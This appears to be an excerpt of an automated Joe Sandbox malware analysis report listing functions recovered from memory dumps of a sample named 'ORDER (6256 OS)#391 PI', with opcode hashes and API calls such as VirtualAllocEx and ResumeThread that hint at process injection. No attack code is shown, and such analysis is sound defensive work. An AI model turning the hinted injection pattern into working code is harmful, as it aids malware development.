Opcode ID: 5e098d12c99f9741f1275ac8b12a7dc93481ae25cbfbc57e41a8cf3ec785c31e
Instruction ID: 068e3a0810dc5599be5f4a08a72511d7c6735b2c10cd6efba03edf452e3519df
Opcode Fuzzy Hash: 5e098d12c99f9741f1275ac8b12a7dc93481ae25cbfbc57e41a8cf3ec785c31e
Instruction Fuzzy Hash: FB2129B5D002099FDB10CF9AC885BDEFBF4FB48324F108429E859A7640D774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01609C49 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01609AA9,00000800,00000000,00000000), ref: 01609CBA

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: db4a651b63128380a8ce30f7e77856c118eb3f6d92a29a69b9d90ad809210de4
Instruction ID: 7adcafc46c75b3d989cf91a57c9b70c1e3a5fe3889a22f062fa6191d4762112e
Opcode Fuzzy Hash: db4a651b63128380a8ce30f7e77856c118eb3f6d92a29a69b9d90ad809210de4
Instruction Fuzzy Hash: 3A1100B6C002098FDB14CF9AC848BDEBBF4AB88324F15842ED919A7700C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0799EF50 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0799EFBB

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5abb6dcf6e8ac57c21b9560e919ec23bc9ce9298f4c47d4113e63abfb8b173eb
Instruction ID: dd08512d86d233b0d00e4f39c67f1645ef3e71f615db3160ba7ed20dd04a0849
Opcode Fuzzy Hash: 5abb6dcf6e8ac57c21b9560e919ec23bc9ce9298f4c47d4113e63abfb8b173eb
Instruction Fuzzy Hash: E71125B6800249DFCB10CF9AC884BDEBFF4FB48324F14841AE529A7610D375A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016099C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01609A2E

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f69031adf034f163f9251a8fda04573dcad952bbef93d5776a1fd15c5b386c39
Instruction ID: 5420a96bf6715b64fb6651c0d4268cd8937b8aa1df086a4b462a19a639506bdc
Opcode Fuzzy Hash: f69031adf034f163f9251a8fda04573dcad952bbef93d5776a1fd15c5b386c39
Instruction Fuzzy Hash: E011DFB6C002498FDB14CF9AC844BDFFBF5AB88324F15851AD82AA7640D374A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 079976C8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0799FCAD

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9ef17346407e07f8dbd48c31016e810c3e1f69dc09fe95cfe7765684b7d9bbcc
Instruction ID: 74721edd531271450eeef165aeb1316d5383bf613dd66f5aa9fc435918cc0a1f
Opcode Fuzzy Hash: 9ef17346407e07f8dbd48c31016e810c3e1f69dc09fe95cfe7765684b7d9bbcc
Instruction Fuzzy Hash: 231103B58003499FDB10DF99D889BDEFBF8EB48324F14881AE915A7700D3B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016099C7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01609A2E

Memory Dump Source

Source File: 00000000.00000002.337691982.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 89fae9e269e0db1022b2d1b5a73708bc01e3d20ada69c6d97afdc2d895d5a62b
Instruction ID: 68269fd1260cae13995318691be30564f0125bef40b542f0bfd3638a0878c3cd
Opcode Fuzzy Hash: 89fae9e269e0db1022b2d1b5a73708bc01e3d20ada69c6d97afdc2d895d5a62b
Instruction Fuzzy Hash: 6B11E0B6C002098FDB14CF9AC944BDEFBF5AF88324F15851AD82AB7640D374A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0799F2C8 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0799F327

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 160bc47fdf0060991fd399833ffdf93048b39c5cf2465ead68a2e67f5eacff34
Instruction ID: 27286aea6b00218b2c98971f73ceae8dc462b4ff768cfa1a307698dd22edb35b
Opcode Fuzzy Hash: 160bc47fdf0060991fd399833ffdf93048b39c5cf2465ead68a2e67f5eacff34
Instruction Fuzzy Hash: 0B1123B1C00209CFCB10DF9AD889BDEFBF8EB48324F10841AD519A7600C778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07989A80 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

`Nl, xrefs: 07989AEC

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: `Nl
API String ID: 0-2983953024
Opcode ID: 230ac21c0eb769d18a232f60038893b14845d2514d3fc8ff8a8fab758dcc9160
Instruction ID: 0c48daabed56b86c0f63ef1977c91af24533f47f126b83bc1f175d360288f762
Opcode Fuzzy Hash: 230ac21c0eb769d18a232f60038893b14845d2514d3fc8ff8a8fab758dcc9160
Instruction Fuzzy Hash: 31913970D00229DFCB64DFA5C984BEDFBB2BF89314F1084A9D509AB251DB71AA85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 07987B88 Relevance: .7, Instructions: 697COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf13731b33f7a011831dc7118fdc92cb8cca9e92bb0b6c3751f8c3373c796b9d
Instruction ID: ac60b381588b87674e8b9b169ccc04b2b14909ff294fb9116659cd8bf8e64a54
Opcode Fuzzy Hash: bf13731b33f7a011831dc7118fdc92cb8cca9e92bb0b6c3751f8c3373c796b9d
Instruction Fuzzy Hash: 4A522374A0415D9FEB28EBA0C860F9DBBB3EF85308F1180AAC2066B754DB355D45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07983110 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c120926ccc61c87abfc58e179604a9bd1b2623dfce94aca86d14f990a3d1bd64
Instruction ID: 4ff76c105a366fa8e58d01b357984769622c4c65f5bc7774e11c9c7db65f9452
Opcode Fuzzy Hash: c120926ccc61c87abfc58e179604a9bd1b2623dfce94aca86d14f990a3d1bd64
Instruction Fuzzy Hash: 2A222570D0065ACFCB21EF68D884A9DFBB1FF85304F15869AD449B7215EB30AA95CF41

Uniqueness

Uniqueness Score: -1.00%

Function 079815D0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13585fb0a1cc05ee939378750ed2762f4f4c9373ae63940c8c1c999c90581af8
Instruction ID: a9b95aa9849d286f0ae79453eaa78e2f7f1177ba4bf61c8543eb80701519ff74
Opcode Fuzzy Hash: 13585fb0a1cc05ee939378750ed2762f4f4c9373ae63940c8c1c999c90581af8
Instruction Fuzzy Hash: 01025D74A40219CFCB54DF28C884A9DBBB6FF85314F1585A9D809AB325DB30ED86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07988780 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56945fd6a6207a7f4e1c2c4c6c71fcfdc38b23f0d6db35c7819818fa6ab65f67
Instruction ID: 3d9551ab127edc5d59df03b76e6699316fadeec5583e5919b5f1f33f661ae606
Opcode Fuzzy Hash: 56945fd6a6207a7f4e1c2c4c6c71fcfdc38b23f0d6db35c7819818fa6ab65f67
Instruction Fuzzy Hash: 3AD1B1F03241058FDB64BA28D854F3937EAFF85648F94446AE112CF7A1DB69DC42CB62

Uniqueness

Uniqueness Score: -1.00%

Function 079805F8 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04673d0b335b27d4f5f021b905cc987cb4179fd81ac43767c6ddb8c2f0f998d6
Instruction ID: ed4658e1d87c2a8727ffd44ff04fefb38a3318509b5ef554c0bac04ecc4450fc
Opcode Fuzzy Hash: 04673d0b335b27d4f5f021b905cc987cb4179fd81ac43767c6ddb8c2f0f998d6
Instruction Fuzzy Hash: 01F1C2B4A0060ADFCB54DFA9C9849AEBBB5FF88314B108569E419AB360D731ED45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 079830F3 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25130a2f78ab278f878a5adc022ba3bf25263c328ff2bb910dfb0a83484526b6
Instruction ID: 63e7742086313ef42bc654af8b2adf7d6ddd9531c960ec95af19c8009dae7b37
Opcode Fuzzy Hash: 25130a2f78ab278f878a5adc022ba3bf25263c328ff2bb910dfb0a83484526b6
Instruction Fuzzy Hash: 56021770D0065ACFDB21EFA8C884AADFBB1BF45304F15C69AD449B7255EB70AA85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 07988D08 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a1dd8325c1844334db5e20617ff8158a50bd93f2a351e0e5a43662bc44d14a
Instruction ID: 8fd0c192e45df5ecddca5b58c49b4515b5af9648592e373c7df177eef2410d1d
Opcode Fuzzy Hash: c3a1dd8325c1844334db5e20617ff8158a50bd93f2a351e0e5a43662bc44d14a
Instruction Fuzzy Hash: 1EC12AB1A00505CFCB54EFACC9889ADBBF6BF89314F5A8055E515AB3A1C735EC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07980C34 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866d190bc23f115acb1de1e25d96b7ee92eb0e6ecb6e926d184579ce3c406150
Instruction ID: 4a5fce147a9e560df10d22683d86ca6da0e53ab8f4786d4b9fd1c5f56df44665
Opcode Fuzzy Hash: 866d190bc23f115acb1de1e25d96b7ee92eb0e6ecb6e926d184579ce3c406150
Instruction Fuzzy Hash: 93A1EF74A00609CFCB55EF68C4808ADBBF2FF88318B658559D44ADB355DB31EC8ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 07980B60 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408a69dfb5a004306b15d5e46b11c6056e7b2993c026a3be268aeba67e5ee88f
Instruction ID: 1eeb25a9d4083ba9f6f97f484db94cdcc34efb92b9a9c0ab9b05f372d7a6f39d
Opcode Fuzzy Hash: 408a69dfb5a004306b15d5e46b11c6056e7b2993c026a3be268aeba67e5ee88f
Instruction Fuzzy Hash: E2811870A0420ACFCB55DF68C4805AEBBF5FF45308B55C56ED44ACB651EB30E946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E01C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28bfbdef50520e27a8faf5ef6eaa33c7fa984a1e5e36943b810e4487c25b951a
Instruction ID: 604011c52d92bdb303c521a1ca31790daa5aea14ef70db3d540aa8d85f2fe55b
Opcode Fuzzy Hash: 28bfbdef50520e27a8faf5ef6eaa33c7fa984a1e5e36943b810e4487c25b951a
Instruction Fuzzy Hash: 48911974B102158FCB58DFB8C498AADB7F2AF49305F6580A9D815AB3A1CB71EC01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07980006 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2df59efe1cff980fd693291890e663430d674ed5dfd48f0fa4b1874d89761eca
Instruction ID: fae51be8ccf3b49b038c0252688ca61fdb31bc3285d9c3c1b4a35a7605eb5c8b
Opcode Fuzzy Hash: 2df59efe1cff980fd693291890e663430d674ed5dfd48f0fa4b1874d89761eca
Instruction Fuzzy Hash: BA719031A14759CFCB01EFB8D8555EEBFB5FF8A300F01856AE445AB251EB309949CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0798AAC0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096cd59e720eb5f4a05716e33a7af7651f507026dcbeb313b7610a904a495c3
Instruction ID: c6024f533dda8a63de433193a750e624f8fcfba179c6d6cf15237d6f6782fee4
Opcode Fuzzy Hash: 2096cd59e720eb5f4a05716e33a7af7651f507026dcbeb313b7610a904a495c3
Instruction Fuzzy Hash: 0351E2B1B04606CFCBA4EF68C884A6EBBB6EF95218F05C46BD505DB351EB70E840C791

Uniqueness

Uniqueness Score: -1.00%

Function 07980260 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1567bedad2b8cdcd36be22c935b1fad9a172bd8091464e22b772d83c714b1ab8
Instruction ID: 679ecaba9dd9fbff7ea3a55af811e961fd650cfc0dc60bbfafe7bbb9737cb4b9
Opcode Fuzzy Hash: 1567bedad2b8cdcd36be22c935b1fad9a172bd8091464e22b772d83c714b1ab8
Instruction Fuzzy Hash: C651E070F0451ACFCF55ABA8C9409FEBBB2FBC8318F10442AE416E3640DB319C568B95

Uniqueness

Uniqueness Score: -1.00%

Function 07987422 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd5fd1c92cf8b4a9ce98029cdd8a4c558779fad3f3cf9fb873c5a5fbf83548a
Instruction ID: 0dbf556392f8bceb99aec119708ae913762387c9ee84e875f68d5069c8819589
Opcode Fuzzy Hash: bbd5fd1c92cf8b4a9ce98029cdd8a4c558779fad3f3cf9fb873c5a5fbf83548a
Instruction Fuzzy Hash: C251B4B13141168FC750EFB9D884A6A7BE9FF4925872945BAE415CB371DB30DC018B60

Uniqueness

Uniqueness Score: -1.00%

Function 07980040 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a3656320aca1347aeaffb1ec28a56f94253147019329cf098a178401e228c11
Instruction ID: c9506d5393b058f2669df55bc21753dc8a7cca49218f8cf0727b0044309db279
Opcode Fuzzy Hash: 4a3656320aca1347aeaffb1ec28a56f94253147019329cf098a178401e228c11
Instruction Fuzzy Hash: 1A615E71A10619CFCF14EFA8D8559AEFBB5FF89300F008529E446AB354EB30A995CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07980B50 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497eadb5653014fa9190d2cfca6189fc592de311a0b8e5155d21841dc62f7f4a
Instruction ID: a2cef71e884eb5564288febf5cf53a13b4f417114e09cbbd53462e6b2a0ca7aa
Opcode Fuzzy Hash: 497eadb5653014fa9190d2cfca6189fc592de311a0b8e5155d21841dc62f7f4a
Instruction Fuzzy Hash: AF51EE74A0030ACFCB51DF68C5808AABBF5FF45308B458A6DD4598B651EB30E94ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07985048 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb8865212298b9b21194c5a578a60bc49eb5f4e2c107a1ce9ffb496b0c4d5ad
Instruction ID: 045380c893a86017c83e5cc7de4bbca0545bc0c5c12ce84fb13c0571ddabc9b1
Opcode Fuzzy Hash: 3cb8865212298b9b21194c5a578a60bc49eb5f4e2c107a1ce9ffb496b0c4d5ad
Instruction Fuzzy Hash: ED41CC743082458FDB19EB349494B7EBBA6AB89208F098469D506CB385DF78CC5ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 07981300 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf8ca8d73d114a8199f7d7905830b8a2b7c31baaf83ca42dbdb5bc08af8b317
Instruction ID: a83276e1ad4aad03162db661b434520bd47cb2ad1ff64746c97cc96942b8a4b2
Opcode Fuzzy Hash: cdf8ca8d73d114a8199f7d7905830b8a2b7c31baaf83ca42dbdb5bc08af8b317
Instruction Fuzzy Hash: 7451AD74A0070ACFCB50DF68C5809AABBF5FF84308B85892DD5599B651EB30FD46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07988B60 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd861df30e383a73b553b3b2f1857e7faef93be355ffe9bc6158483140c767d
Instruction ID: 30f85aec0e9f036870f80a57257f822ce1da9ba349cf4684fe3117f25cb513aa
Opcode Fuzzy Hash: ccd861df30e383a73b553b3b2f1857e7faef93be355ffe9bc6158483140c767d
Instruction Fuzzy Hash: 3741F2757142089FC718AB64E854EAE7BB6FFC9204F148069E516DB380CF34DC02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0798ADFF Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1bf2366c434e4f70848d2af64a2386b56277486943f054651fe36c86edebab
Instruction ID: ebc06aaa081b6585185cb2e9b15b2ba3dc94bb620199accebd0ea6b64f9d9937
Opcode Fuzzy Hash: 4e1bf2366c434e4f70848d2af64a2386b56277486943f054651fe36c86edebab
Instruction Fuzzy Hash: FC412DB170011A9FCB15EF65E845AAE7BB6FFC8218F05852AF80297294DB34DC56CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 07987221 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44e70e35b4ed8b22dedccfc9a453c002c6e2be1cc10ad50e363dcc526c5d812
Instruction ID: a1d1bf8c779c8dc100d602f6ac238c0581223f0132830cb145f5f0dd0c00615e
Opcode Fuzzy Hash: d44e70e35b4ed8b22dedccfc9a453c002c6e2be1cc10ad50e363dcc526c5d812
Instruction Fuzzy Hash: C64147B5600106DFCB14AFA9E848A6E7BB5FF88304F11006AF916DB3A0C630DC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07989849 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e47ca7dc11dfcb5395b6baa299ec6595599814772f8925939990e30e8f4427c
Instruction ID: 5a7f767851c48660ea824b10d50c1289e7a059c21a59050018592b3002686c4c
Opcode Fuzzy Hash: 2e47ca7dc11dfcb5395b6baa299ec6595599814772f8925939990e30e8f4427c
Instruction Fuzzy Hash: D241AFB5E002189FDB48DFA9D855A9DFBB2BF88300F14802AE919B7354DB345906CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07980243 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc58b72788dd35104e186579ef2d814fbd117f6f68ae49740b03ad82526dd48d
Instruction ID: 7747819cc337f05cf39d4e67ea2ee8ba1f8a4f2a38f29085ed33b32adca5724d
Opcode Fuzzy Hash: dc58b72788dd35104e186579ef2d814fbd117f6f68ae49740b03ad82526dd48d
Instruction Fuzzy Hash: B1314275B00246CFCB52DBA8C9404AEBBF2FF89218B14046AE416E7741D330EC0ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 07989858 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92183b9f06b923176d836a4b6d04091703b0d2cbaf6445cf7f314a08e1fae4c6
Instruction ID: e6510372b2101fe0f0b70668be322604748a90cde2be45d7ad26a9b7efb49fc4
Opcode Fuzzy Hash: 92183b9f06b923176d836a4b6d04091703b0d2cbaf6445cf7f314a08e1fae4c6
Instruction Fuzzy Hash: F4419FB5E002189FDB48DFA9D955ADEFBF2BF88300F10802AE919A7354DB345906CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07980F28 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7b9de9bedba83e03f7d5f951b3541a8b4a17e36a786a02e9d28b96f156fdb0
Instruction ID: 5f4d41dda6f84ba07e2328d8f70b9b5742e1f8b39ba8fe36f109bf2f3082f1a6
Opcode Fuzzy Hash: 5f7b9de9bedba83e03f7d5f951b3541a8b4a17e36a786a02e9d28b96f156fdb0
Instruction Fuzzy Hash: 8E31D5722083659FC702CF5DDC819AABBB9EF85265B15846BF444CB251C731DC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0798A420 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b9e7861fb2cce79ea30fe3ea8326dcae9637da7aef641dcc502a8db62a9e10
Instruction ID: c8b405abb8c0eef19fbab6092a2c412853625047f37f896421503ea157ca95b0
Opcode Fuzzy Hash: 09b9e7861fb2cce79ea30fe3ea8326dcae9637da7aef641dcc502a8db62a9e10
Instruction Fuzzy Hash: CD41E2B4E00218DFDB18DFA5D894A9EBBB2BF89304F14902AE415BB394DB309C45CF45

Uniqueness

Uniqueness Score: -1.00%

Function 07980BD0 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

